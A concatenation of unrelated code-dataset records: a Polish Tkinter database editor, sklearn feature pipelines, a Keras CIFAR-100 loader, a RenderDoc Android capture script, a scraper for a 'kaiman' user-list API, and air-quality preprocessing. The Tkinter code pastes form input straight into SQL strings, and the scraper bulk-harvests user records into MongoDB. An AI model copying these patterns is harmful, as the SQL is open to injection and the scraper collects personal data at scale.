'\r\n\r\n if res_label[i][2].get() == '':\r\n if results[i][3] == '':\r\n pass\r\n else:\r\n query_SET += f'Weight=NULL, '\r\n else:\r\n try:\r\n weight = int(res_label[i][2].get())\r\n if weight != results[i][3]:\r\n query_SET += f'Weight={weight}, '\r\n except ValueError:\r\n error['text'] = 'Waga musi być liczbą'\r\n return\r\n\r\n if res_label[i][3].get() != results[i][4]:\r\n query_SET += f'Set2=\"{res_label[i][3].get()}\", '\r\n\r\n 
if query_SET != '':\r\n changes.append([results[i][0], query_SET])\r\n\r\n for change in changes:\r\n cursor.execute(f\"\"\"\r\n UPDATE attributes_sets \r\n SET {change[1][:-2]}\r\n WHERE ID={change[0]}\r\n \"\"\")\r\n db.commit()\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n def remove():\r\n for i in range(len(var)):\r\n if var[i].get() == 1:\r\n cursor.execute(f\"\"\"\r\n DELETE FROM attributes_sets\r\n WHERE ID={results[i][0]};\r\n \"\"\")\r\n db.commit()\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n frame_data = LabelFrame(view_frame, text=\"Dane\")\r\n frame_data.configure(bg=std_bg)\r\n res_label = []\r\n var = []\r\n for i in range(len(results)):\r\n var.append(IntVar())\r\n res_label.append([\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Checkbutton(frame_data, width=1, bg=std_bg, variable=var[i], onvalue=1)\r\n ])\r\n\r\n for i in range(len(res_label)):\r\n res_label[i][0].insert(0, results[i][1])\r\n res_label[i][1].insert(0, results[i][2])\r\n res_label[i][2].insert(0, results[i][3])\r\n res_label[i][3].insert(0, results[i][4])\r\n res_label[i][0].grid(row=i, column=0, pady=2)\r\n res_label[i][1].grid(row=i, column=1, pady=2)\r\n res_label[i][2].grid(row=i, column=2, pady=2)\r\n res_label[i][3].grid(row=i, column=3, pady=2)\r\n res_label[i][4].grid(row=i, column=4, pady=2)\r\n\r\n change_button = Button(frame_data, text=\"Zmień\", width=16, bg='#525252', fg='#EEEEEE', command=change_data)\r\n change_button.grid(row=len(res_label) + 1, column=3)\r\n remove_button = Button(frame_data, text=\"Usuń\", width=4, bg='#525252', fg='#EEEEEE', command=remove)\r\n remove_button.grid(row=len(res_label) + 1, column=4)\r\n frame_data.grid(row=2, column=0)\r\n\r\n \"\"\" DODAWANIE NOWEJ 
POZYCJI \"\"\"\r\n\r\n def add_new():\r\n if not e_name.get():\r\n error['text'] = 'Nazwa musi być podana'\r\n return\r\n elif not e_set1.get():\r\n error['text'] = 'Pierwszy zestaw musi być podany'\r\n return\r\n if e_weight.get() != '':\r\n try:\r\n weight = int(e_weight.get())\r\n except ValueError:\r\n error['text'] = 'Waga musi być liczbą'\r\n return\r\n else:\r\n weight = \"NULL\"\r\n\r\n error['text'] = ''\r\n cursor.execute(f\"\"\"\r\n INSERT INTO attributes_sets (Name, Set1, Weight, Set2)\r\n VALUES ('{e_name.get()}', '{e_set1.get()}', {weight}, '{e_set2.get()}');\r\n \"\"\")\r\n db.commit()\r\n e_name.delete(0, END)\r\n e_set1.delete(0, END)\r\n e_weight.delete(0, END)\r\n e_set2.delete(0, END)\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n frame_new = LabelFrame(view_frame, text=\"Dodaj nowe\")\r\n frame_new.configure(bg=std_bg)\r\n e_name = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_set1 = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_weight = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_set2 = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_name.grid(row=0, column=0)\r\n e_set1.grid(row=0, column=1)\r\n e_weight.grid(row=0, column=2)\r\n e_set2.grid(row=0, column=3)\r\n add_button = Button(frame_new, text=\"Dodaj\", width=16, bg='#525252', fg='#EEEEEE', command=add_new)\r\n add_button.grid(row=1, column=3)\r\n error = Label(view_frame, text='', bg=std_bg, fg='red')\r\n frame_new.grid(row=0, column=0, pady=20)\r\n error.grid(row=3, column=0)\r\n\r\n exit_button = Button(view_frame, text=\"Wyjdź\", width=16, bg='#525252', fg='#EEEEEE', command=root.destroy)\r\n exit_button.grid(row=5, column=0)\r\n 
root.mainloop()\r\n","sub_path":"GUI/attributes_sets_options.py","file_name":"attributes_sets_options.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84899468","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPipelines for building features\n\"\"\"\nimport logging\nimport numpy as np\n\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn.base import BaseEstimator\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.decomposition import LatentDirichletAllocation as LatentDirichlet\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass DummyTransform(BaseEstimator):\n \"\"\"Return content length as features.\n do nothing to the labels\"\"\"\n\n def fit(self, X, y):\n return self\n\n def transform(self, X):\n return np.array(X['content'].str.len())[:, None]\n\n\nclass Tfidf(TfidfTransformer):\n\n def fit_transform(self, *args, **kwargs):\n logging.info('Fit & Transform TF-IDF...')\n return super().fit_transform(*args, **kwargs)\n\n\nclass SVD(TruncatedSVD):\n\n def fit_transform(self, *args, **kwargs):\n logging.info('Fit & Transform TruncatedSVD...')\n return super().fit_transform(*args, **kwargs)\n\n\nclass Count(CountVectorizer):\n\n def fit_transform(self, raw_documents, y=None):\n logging.info(f'Fit & Transform CountVectorizer...')\n ret = super().fit_transform(raw_documents, y=y)\n logging.info(f'Vocab Size: {len(self.vocabulary_)}')\n return ret\n\n\nclass SparseToDense(BaseEstimator):\n \"\"\"Return content length as features.\n do nothing to the labels\"\"\"\n\n def fit(self, X, y):\n return self\n\n def transform(self, X):\n return X.toarray()\n\n\nclass OverSample(BaseEstimator):\n\n def __init__(self, *args, **kwargs):\n return super().__init__(*args, **kwargs)\n\n\n# ------- Feature Builder -----------------\ndef 
is_list_or_tuple(obj):\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\n# Feature model specifications\n# For Chinese\nfm_spec = {\n 'count': Count(ngram_range=(1, 5), min_df=0.001, max_df=0.99),\n 'tfidf': ['count', Tfidf()],\n 'lsa_200': ['tfidf', SVD(n_components=200)],\n 'lsa_500': ['tfidf', SVD(n_components=500)],\n 'lsa_1k': ['tfidf', SVD(n_components=1000)],\n # smaller vocabulary (removed more stop and infrequent words)\n 'count_sv': Count(ngram_range=(1, 5), min_df=0.02, max_df=1.0),\n 'tfidf_sv': ['count_sv', Tfidf()],\n 'tfidf_sv_dense': ['tfidf_sv', SparseToDense()],\n 'lsa_200_sv': ['tfidf_sv', SVD(n_components=200)],\n 'lsa_500_sv': ['tfidf_sv', SVD(n_components=500)],\n}\n\n# For English\nfm_spec_en = fm_spec.copy()\nfm_spec_en['count'] = Count(\n ngram_range=(1, 4), min_df=0.01, stop_words='english')\nfm_spec_en['count_sv'] = Count(\n ngram_range=(1, 4), min_df=0.02, stop_words='english')\n\n\ndef ensure_named_steps(steps, spec=fm_spec, cache=None):\n \"\"\"make sure steps are named tuples.\n Also handles dependencies in steps.\n \"\"\"\n if not isinstance(steps, list):\n steps = [steps]\n # make a copy of the steps\n if is_list_or_tuple(steps):\n steps = list(steps)\n steps_ = []\n # while steps is not empty\n while steps:\n name, estimator = None, steps.pop(0)\n if isinstance(estimator, str):\n # if string, look it up from cache or spec\n if cache and estimator in cache:\n # if in cache, return cache\n name, estimator = estimator, cache[estimator]['model']\n else:\n # otherwise resolve spec\n name, estimator = estimator, spec[estimator]\n elif is_list_or_tuple(estimator):\n # when estimator has name already, expand it\n name, estimator = estimator\n\n # if is an array in cache\n if isinstance(estimator, list):\n # make sure current name is used for the last step\n # in the cached spec\n if not isinstance(estimator[-1], tuple):\n estimator[-1] = (name, estimator[-1])\n # add back to list\n steps = estimator + steps\n continue\n\n # 
Initialize estimator if necessary\n if callable(estimator):\n estimator = estimator()\n\n # if still haven't figured out step name\n if name is None:\n # get the name from class name\n name = estimator.__class__.__name__\n\n steps_.append((name, estimator))\n return steps_\n\n\nclass FeaturePipeline(Pipeline):\n \"\"\"\n FeaturePipeline with spec and cache support.\n\n Usage:\n\n fm_spec = {\n 'count': CountVectorizer(ngram_range=(1, 4), min_df=0.01,\n max_df=0.99),\n 'tfidf': ['count', TfidfTransformer],\n }\n fm = defaultdict(dict)\n model = FeaturePipeline('tfidf', spec=fm_spec, cache=fm)\n model.fit_transform(X_train)\n model.transform(X_test)\n\n Generates:\n\n > fm['tfidf']\n {'model': FeaturePipeline(...),\n 'train': numpy.array,\n 'test': numpy.array}\n > fm['count']\n {'model': FeaturePipeline(...), ...}\n\n Parameters\n ----------\n spec: a dictionary of specs matching count to id\n cache: a defaultdict to store estimator and train/test results\n \"\"\"\n\n @classmethod\n def from_spec(cls, name, spec=fm_spec, cache=None, **kwargs):\n if cache is not None and name in cache:\n return cache[name]['model']\n return cls(name, spec, cache, **kwargs)\n\n def __init__(self, steps='tfidf_sv', spec=fm_spec, cache=None, **kwargs):\n steps = ensure_named_steps(steps, spec, cache)\n super().__init__(steps, **kwargs)\n # if speficied cache, save self to cache\n if cache is not None:\n self.cache = cache[self._final_estimator_name]\n self.cache['model'] = self\n else:\n self.cache = None\n\n @property\n def _final_estimator_name(self):\n return self.steps[-1][0]\n\n def fit_transform(self, X, y=None, **fit_params):\n \"\"\"Fit transform the training data and save the results in cache\"\"\"\n cache_name = self._final_estimator_name\n cache = self.cache\n if cache and 'train' in cache:\n logger.info(f' {cache_name}: fit_transform use cache.')\n return cache['train']\n Xt = super().fit_transform(X, y, **fit_params)\n if cache is not None:\n cache['train'] = Xt\n return 
Xt\n\n def transform(self, X):\n \"\"\"Transform the testing data and save the results in cache\"\"\"\n cache_name = self._final_estimator_name\n cache = self.cache\n if cache and 'test' in cache:\n logger.info(f' {cache_name}: transform use cache.')\n return cache['test']\n Xt = super().transform(X)\n if cache is not None:\n cache['test'] = Xt\n return Xt\n\n\n# ------- Additional helpers and basic pipelines ---------\n\ndef build_features(X_train, X_test, steps='tfidf_sv', spec=fm_spec, **kwargs):\n # if provided both training and testing dataset\n # otherwise, load it from cache\n feature = FeaturePipeline(steps, spec=spec, **kwargs)\n X_train = feature.fit_transform(X_train)\n X_test = feature.transform(X_test)\n return X_train, X_test\n\n","sub_path":"fgclassifier/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36990727","text":"import calculate\r\nimport sklearn\r\nfrom showData import loadDatadet\r\nfrom calculate import kNN\r\n\"\"\"\r\n成绩得出的难点问题:\r\n1.对于不同衡量标准,其数学形式抽象出来的具体问题 度量不是单纯的线性关系\r\n2.对于不同衡量标准,键值的高低并不能绝对的影响最终成绩,若干项低标准值可能产生较高的结果\r\n3.在标准的整个百分制中,不同等级问题出现阈值分布不均匀\r\n\r\n4.四个特征属性 一共对应至少81种状态结果\r\n\"\"\"\r\nscores = [\r\n [80.6, 78.80, 90.5, 76, 0],\r\n [70.6, 78.80, 90.5, 76, 0],\r\n [60.6, 78.80, 90.5, 76, 0],\r\n [50.6, 78.80, 90.5, 76, 0],\r\n [40.6, 78.80, 40.5, 76, 0],\r\n # 存在拼凑可能 <60.0 正常值 偏差较大 正常值\r\n [20.6, 78.80, 90.5, 76, 0],\r\n # 没按老师给定的方法完成任务,完成了一定量,但质量不高\r\n # <60.0 正常值 正常值 正常值\r\n [90.6, 78.80, 90.5, 76, 0],\r\n # 正常作业\r\n [95.6, 78.80, 90.5, 76, 0],\r\n # 跟着老师完成任务,改动不大\r\n [99.6, 78.80, 90.5, 76, 0]\r\n # 97->99 正常值 正常值 正常值\r\n # 存在抄袭嫌疑\r\n]\r\n\r\n# 相似度\r\ne = calculate.distance(scores[1], scores[7])\r\ncos = calculate.cos(scores[1], scores[8])\r\nprint(e)\r\nprint(cos)\r\n\r\n# 分类\r\ninfile='./dataSet.txt'\r\nk = 5\r\nsrc = loadDatadet(infile, 
k)\r\nkNN(src)\r\n\r\n\r\n","sub_path":"CodeSimi/getScore.py","file_name":"getScore.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"405373778","text":"from __future__ import absolute_import\nfrom .cifar import load_batch\nfrom ..utils.data_utils import get_file\nfrom .. import backend as K\nimport numpy as np\nimport os\n\n\ndef load_data(label_mode='fine'):\n \"\"\"Loads CIFAR100 dataset.\n\n # Arguments\n label_mode: one of \"fine\", \"coarse\".\n\n # Returns\n Tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.\n\n # Raises\n ValueError: in case of invalid `label_mode`.\n \"\"\"\n if label_mode not in ['fine', 'coarse']:\n raise ValueError('`label_mode` must be one of `\"fine\"`, `\"coarse\"`.')\n\n dirname = 'cifar-100-python'\n origin = 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'\n path = get_file(dirname, origin=origin, untar=True)\n\n fpath = os.path.join(path, 'train')\n x_train, y_train = load_batch(fpath, label_key=label_mode + '_labels')\n\n fpath = os.path.join(path, 'test')\n x_test, y_test = load_batch(fpath, label_key=label_mode + '_labels')\n\n y_train = np.reshape(y_train, (len(y_train), 1))\n y_test = np.reshape(y_test, (len(y_test), 1))\n\n if K.image_data_format() == 'channels_last':\n x_train = x_train.transpose(0, 2, 3, 1)\n x_test = x_test.transpose(0, 2, 3, 1)\n\n return (x_train, y_train), (x_test, y_test)\n","sub_path":"Keras_tensorflow_nightly/source2.7/keras/datasets/cifar100.py","file_name":"cifar100.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"620393627","text":"# https://github.com/baldurk/renderdoc/search?l=Python&q=ExecuteAndInject\n\nimport logging\nimport os\nimport threading\nimport time\n\nimport renderdoc as rd\nfrom _android import get_device_name, get_main_activity\nfrom _shutil import 
get_date_str, get_home_path, setup_logger\n\n\ndef list_executables(remote):\n # GetHomeFolder() gives you a good default path to start with.\n # ListFolder() lists the contents of a folder and can recursively\n # browse the remote filesystem.\n home = remote.GetHomeFolder()\n paths = remote.ListFolder(home)\n logging.info(f\"Executables in home folder '{home}':\")\n for p in paths:\n logging.info(\" - \" + p.filename)\n\n\ndef main():\n # This sample is intended as an example of how to do remote capture and replay\n # as well as using device protocols to automatically enumerate remote targets.\n #\n # It is not complete since it requires filling in with custom logic to select\n # the executable and trigger the capture at the desired time\n # raise RuntimeError(\"This sample should not be run directly, read the source\")\n\n rd.InitialiseReplay(rd.GlobalEnvironment(), [])\n\n protocols = rd.GetSupportedDeviceProtocols()\n logging.info(f\"Supported device protocols: {protocols}\")\n\n protocol_to_use = \"adb\"\n\n # the protocol must be supported\n if protocol_to_use not in protocols:\n raise RuntimeError(f\"{protocol_to_use} protocol not supported\")\n\n protocol = rd.GetDeviceProtocolController(protocol_to_use)\n\n devices = protocol.GetDevices()\n\n if len(devices) == 0:\n raise RuntimeError(f\"no {protocol_to_use} devices connected\")\n\n if \"ANDROID_SERIAL\" in os.environ:\n device = os.environ[\"ANDROID_SERIAL\"]\n else:\n # Choose the first device\n device = devices[0]\n\n name = protocol.GetFriendlyName(device)\n logging.info(f\"Running test on {device} - {name}\")\n\n url = protocol.GetProtocolName() + \"://\" + device\n\n # Protocols can enumerate devices which are not supported. 
Capture/replay\n # is not guaranteed to work on these devices\n if not protocol.IsSupported(url):\n raise RuntimeError(f\"{device} doesn't support capture/replay - too old?\")\n\n # Protocol devices may be single-use and not support multiple captured programs\n # If so, trying to execute a program for capture is an error\n if not protocol.SupportsMultiplePrograms(url):\n # check to see if anything is running. Just use the URL\n ident = rd.EnumerateRemoteTargets(url, 0)\n\n if ident != 0:\n logging.info(f\"{name} already has a program running on {ident}\")\n # raise RuntimeError(f\"{name} already has a program running on {ident}\")\n\n while True:\n try:\n # Let's try to connect\n result, remote = rd.CreateRemoteServerConnection(url)\n\n if result == rd.ResultCode.NetworkIOFailed and protocol is not None:\n # If there's just no I/O, most likely the server is not running. If we have\n # a protocol, we can try to start the remote server\n logging.info(\"Couldn't connect to remote server, trying to start it\")\n\n result = protocol.StartRemoteServer(url)\n\n if result != rd.ResultCode.Succeeded:\n raise RuntimeError(\n f\"Couldn't launch remote server, got error {str(result)}\"\n )\n\n break\n\n except RuntimeError as ex:\n logging.warn(f\"Error on connection: {ex}\")\n logging.info(\"Try to connect again\")\n\n # We now have a remote connection. This works regardless of whether it's a device\n # with a protocol or not. 
In fact we are done with the protocol at this point\n logging.info(\"Got connection to remote server\")\n protocol = None\n\n # list_executables(remote)\n\n # Select your executable, perhaps hardcoded or browsing using the above\n # functions\n pkg_name = os.environ[\"PKG_NAME\"]\n\n exe = os.environ.get(\"START_ACTIVITY\")\n if not exe:\n exe = get_main_activity(pkg_name)\n\n workingDir = \"\"\n cmdLine = \"\"\n env = []\n opts = rd.GetDefaultCaptureOptions()\n\n logging.info(f\"Running {exe}\")\n\n result = remote.ExecuteAndInject(exe, workingDir, cmdLine, env, opts)\n\n if result.result != rd.ResultCode.Succeeded:\n remote.ShutdownServerAndConnection()\n raise RuntimeError(f\"Couldn't launch {exe}, got error {str(result.result)}\")\n\n # Spin up a thread to keep the remote server connection alive while we make a capture,\n # as it will time out after 5 seconds of inactivity\n def ping_remote(remote, kill):\n success = True\n while success and not kill.is_set():\n success = remote.Ping()\n time.sleep(1)\n\n kill = threading.Event()\n ping_thread = threading.Thread(target=ping_remote, args=(remote, kill))\n ping_thread.start()\n\n # Create target control connection\n target = rd.CreateTargetControl(url, result.ident, \"remote_capture.py\", True)\n\n if target is None:\n kill.set()\n ping_thread.join()\n remote.ShutdownServerAndConnection()\n raise RuntimeError(f\"Couldn't connect to target control for {exe}\")\n\n logging.info(\"Connected - waiting for desired capture\")\n\n # TODO: Wait for the capture condition we want\n # capture_condition()\n\n logging.info(\"Wait for 15 seconds\")\n time.sleep(15)\n\n logging.info(\"Triggering capture\")\n\n target.TriggerCapture(1)\n\n # Pump messages, keep waiting until we get a capture message. 
Time out after 30 seconds\n msg = None\n start = time.clock()\n while msg is None or msg.type != rd.TargetControlMessageType.NewCapture:\n msg = target.ReceiveMessage(None)\n\n if time.clock() - start > 30:\n break\n\n # Close the target connection, we're done either way\n target.Shutdown()\n target = None\n\n # Stop the background ping thread\n kill.set()\n ping_thread.join()\n\n # If we didn't get a capture, error now\n if msg.type != rd.TargetControlMessageType.NewCapture:\n remote.ShutdownServerAndConnection()\n raise RuntimeError(\n \"Didn't get new capture notification after triggering capture\"\n )\n\n cap_path = msg.newCapture.path\n cap_id = msg.newCapture.captureId\n\n logging.info(\n f\"Got new capture at {cap_path} which is frame {msg.newCapture.frameNumber} with {msg.newCapture.api}\"\n )\n\n # We could save the capture locally\n local_file = os.path.join(\n get_home_path(),\n \"Desktop\",\n f\"{pkg_name}-{get_device_name()}-{get_date_str()}.rdc\",\n )\n logging.info(f\"Save capture to {local_file}\")\n remote.CopyCaptureFromRemote(\n cap_path,\n local_file,\n None,\n )\n\n\nsetup_logger()\nmain()\n","sub_path":"scripts/r/rdoc/capture_renderdoc_android.py","file_name":"capture_renderdoc_android.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173537925","text":"from loguru import logger\n\nfrom utils import request, run_func, mongo\nfrom config import ACCESS_TOKEN, RUN_SIGN\n\n\n@run_func()\ndef writer(row: dict or list):\n if isinstance(row, dict):\n row.update({'times': f'{RUN_SIGN}'})\n elif isinstance(row, list):\n [x.update({'times': f'{RUN_SIGN}'}) for x in row]\n\n mongo.insert(row, 'kaiman')\n\n\n@run_func()\ndef auto_list():\n uri = 'https://kaiman.tradedge.cn/api/user/user_data/list'\n header = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 
MicroMessenger/7.0.9.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat',\n 'auth-token': ACCESS_TOKEN,\n 'content-type': 'application/json',\n # 'Referer': 'https://servicewechat.com/wx2fc2b286963f2cff/1/page-frame.html',\n 'Accept-Encoding': 'gzip, deflate, br'\n }\n\n user_list = []\n\n data = {'keyword': '', 'nextKey': '', 'pageSize': '200'}\n resp = request(uri, header, data=data, json=True)\n\n while True:\n for user in resp.get('data').get('list'):\n user_id = user.get('userId')\n if user_id not in user_list:\n user_list.append(user_id)\n writer(user)\n else:\n logger.info(f'重复 - {user_id}')\n # writer(resp.get('data').get('list'))\n\n data['nextKey'] = resp.get('data').get('nextKey')\n resp = request(uri, header, data=data, json=True)\n\n\nif __name__ == '__main__':\n auto_list()\n","sub_path":"now/kaiman/spider_kaiman.py","file_name":"spider_kaiman.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525872241","text":"import sys\nfrom pathlib import Path\nhome = str(Path.home())\nsys.path.insert(0, home+'/MasterThesis/')\n\n##\n\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\nfrom Preprocessing.Point import Point\nfrom Preprocessing.Coord import Coord\nfrom Preprocessing.Bounding_box import Bounding_box\n\n##\n\ndef convert_cardial_to_angular(cardinal_values):\n dict_cardinal = {\"N\": 360, \"NbE\": 11.25, \"NNE\": 22.5, \"NEbN\": 33.75, \"NE\": 45, \"NEbE\": 56.25,\n \"ENE\": 67.5, \"EbN\": 78.75, \"E\": 90, \"EbS\": 101.25, \"ESE\": 112.5, \"SEbE\": 123.75,\n \"SE\": 135, \"SEbS\": 146.25, \"SSE\": 157.5, \"SbE\": 168.75, \"S\": 180, \"SbW\": 191.25,\n \"SSW\": 202.5, \"SWbS\": 213.75, \"SW\": 225, \"SWbW\": 236.25, \"WSW\": 247.5, \"WbS\": 258.75,\n \"W\": 270, \"WbN\": 281.25, \"WNW\": 292.5, \"NWbW\": 303.75, \"NW\": 315, \"NWbN\": 326.25,\n 
\"NNW\": 337.5, \"NbW\": 348.75}\n angular_data = np.empty(len(cardinal_values))\n angular_data[:] = np.nan\n\n for i in range(len(cardinal_values)):\n if pd.isna(cardinal_values.iloc[i]) ==False:\n angular_data[i] = dict_cardinal[cardinal_values.iloc[i]]\n return pd.Series(angular_data)\n\n##\n\n# Read data from 12 monitoring stations\n\n'''\ndata_Aotizhongxin = pd.read_csv('data/data2013-2017/Aotizhongxin.csv')\ndata = pd.DataFrame(columns=data_Aotizhongxin.columns)\ndata = pd.concat([data, data_Aotizhongxin], axis=0)\ndata_changping = pd.read_csv('data/data2013-2017/Changping.csv')\ndata = pd.concat([data, data_changping], axis=0)\ndata_dingling = pd.read_csv('data/data2013-2017/Dingling.csv')\ndata = pd.concat([data, data_dingling], axis=0)\ndata_dongsi = pd.read_csv('data/data2013-2017/Dongsi.csv')\ndata = pd.concat([data, data_dongsi], axis=0)\ndata_guanyuan = pd.read_csv('data/data2013-2017/Guanyuan.csv')\ndata = pd.concat([data, data_guanyuan], axis=0)\ndata_gucheng = pd.read_csv('data/data2013-2017/Gucheng.csv')\ndata = pd.concat([data, data_gucheng], axis=0)\ndata_huairou = pd.read_csv('data/data2013-2017/Huairou.csv')\ndata = pd.concat([data, data_huairou], axis=0)\ndata_Nongzhanguan = pd.read_csv('data/data2013-2017/Nongzhanguan.csv')\ndata = pd.concat([data, data_Nongzhanguan], axis=0)\ndata_Shunyi = pd.read_csv('data/data2013-2017/Shunyi.csv')\ndata = pd.concat([data, data_Shunyi], axis=0)\ndata_Tiantan = pd.read_csv('data/data2013-2017/Tiantan.csv')\ndata = pd.concat([data, data_Tiantan], axis=0)\ndata_Wanliu = pd.read_csv('data/data2013-2017/Wanliu.csv')\ndata = pd.concat([data, data_Wanliu], axis=0)\ndata_Wanshouxigong = pd.read_csv('data/data2013-2017/Wanshouxigong.csv')\ndata = pd.concat([data, data_Wanshouxigong], axis=0)\n'''\n\n##\n# See correlation\n'''\ndata = data.reset_index(drop=True)\ncorr_data = data.corr()\n'''\n\n##\n''''\ndata = data.drop(columns=[\"No\"])\n'''\n##\n'''\nimport datetime\ndata.insert(0,'utc_time',0)\n'''\n##\n# Merge 
data from 12 monitoring stations\n'''\nfor i in range(len(data)):\n data.iloc[i,0] = datetime.datetime(data.iloc[i,1], data.iloc[i,2], data.iloc[i,3], data.iloc[i,4], 0)\n print(i)\ndata.to_csv(\"data/data2013-2017/data_2013_2017.csv\", index=False)\n'''\n##\n\n# PREPROCESSING\n\n# Read data\nprint(\"reading data ...\")\ndata = pd.read_csv(home+\"/MasterThesis/data/data2013-2017/data_2013_2017.csv\")\nbb_aq_stations = pd.read_csv(home+'/MasterThesis/data/data2013-2017/unlabeled_points.csv')\ncoord_aq_stations = pd.read_csv(home+'/MasterThesis/data/data2013-2017/stations.csv')\npoint_centroids = pd.read_csv(home+'/MasterThesis/data/centroids_aq_csv.csv')\n\n##\n\n# Convert string to datetime\ndata['utc_time'] = pd.to_datetime(data['utc_time'],utc=True)\n\n##\n\nstart_date = '2016-01-01 00:00:00+00:00'\nend_date = \"2016-12-31 23:00:00+00:00\"\n\nprint(\"Selecting data of the 2016 ...\")\n# Select data of 2016\n\ndata_2016 = data[data['year'] == 2016]\n\n##\n\nprint(\"NaN values: \")\n\n# Nan values\nnull_columns= data_2016.columns[data_2016.isna().any()]\naq_sum_null = data_2016[null_columns].isna().sum()\nprint(\"Nan values in pollutant data\")\nprint(aq_sum_null)\n\n##\n\nprint(\"Percentage of NaN data\")\n# Get percentage of missing values\npercen_pm25 = (aq_sum_null['PM2.5'] * 100) / len(data_2016)\npercen_pm10 = (aq_sum_null['PM10'] * 100) / len(data_2016)\npercen_SO2 = (aq_sum_null['SO2'] * 100) / len(data_2016)\npercen_NO2 = (aq_sum_null['NO2'] * 100) / len(data_2016)\npercen_CO = (aq_sum_null['CO'] * 100) / len(data_2016)\npercen_O3 = (aq_sum_null['O3'] * 100) / len(data_2016)\nprint(\"Percentage PM2.5 Nan values: \", percen_pm25)\nprint(\"Percentage PM10 Nan values: \", percen_pm10)\nprint(\"Percentage O3 Nan values: \", percen_SO2)\nprint(\"Percentage PM2.5 Nan values: \", percen_NO2)\nprint(\"Percentage PM10 Nan values: \", percen_CO)\nprint(\"Percentage O3 Nan values: \", percen_O3)\n\n##\n\ndata_2016 = data_2016.drop(columns=[\"year\", \"month\", 
\"day\", \"hour\", \"RAIN\"])\n\n##\n\nprint(\"Showing if there are missing dates in the data ...\")\nend_date = pd.to_datetime(data_2016.utc_time.max())\ncount = 0\n\nflag = False\nfor station in data_2016.station.unique():\n start_date = pd.to_datetime(data_2016.utc_time.min())\n while start_date <= end_date:\n if start_date != pd.to_datetime(data_2016.iloc[count, 0]):\n print(\"Missing date: \", start_date)\n flag = True\n start_date += timedelta(hours=1)\n count += 1\n\nif flag == False:\n print(\"There aren't missing dates in the data\")\n\n##\n\nselected_columns = ['station', 'utc_time', 'TEMP', 'PRES', 'DEWP', 'WSPM', 'wd', 'PM2.5']\ndata = data_2016[selected_columns].reset_index(drop=True)\n\n##\n\ndata['wd'] = convert_cardial_to_angular(data['wd'])\n\n##\n\nprint(\"Applying Linear Interpolation for NaN values ...\")\n# Apply linear interpolation for NaN values\ndata = data.assign(pm25=data['PM2.5'].interpolate(method='linear'))\ndata = data.assign(temp=data['TEMP'].interpolate(method='linear'))\ndata = data.assign(pres=data['PRES'].interpolate(method='linear'))\ndata = data.assign(dewp=data['DEWP'].interpolate(method='linear'))\ndata = data.assign(ws=data['WSPM'].interpolate(method='linear'))\ndata = data.assign(wd=data['wd'].interpolate(method='linear'))\n\n##\n\nselected_columns = ['station', 'utc_time', 'temp', 'pres', 'dewp', 'ws', 'wd', 'pm25']\ndata = data[selected_columns]\n\n##\n\nplt.figure(figsize = (10, 12))\nplt.plot(data[\"pm25\"])\n\n##\n# See heat map of missing values\nsns.heatmap(data.isnull(), cbar=False)\n\n##\n\n# Get neighbors for each monitoring station\nknn = 7\n\ndict_neighbors = {}\nfor i in range(len(coord_aq_stations)):\n other_stations = coord_aq_stations.drop(i, axis=0)\n coord = Coord(coord_aq_stations.iloc[i, 1], coord_aq_stations.iloc[i, 2])\n neighbors = coord.get_neighbors(other_stations, knn)\n dict_neighbors.update({str(coord_aq_stations.iloc[i, 0]): neighbors})\n\n##\n\nprint(\"Creating data processed\")\ndata_processed 
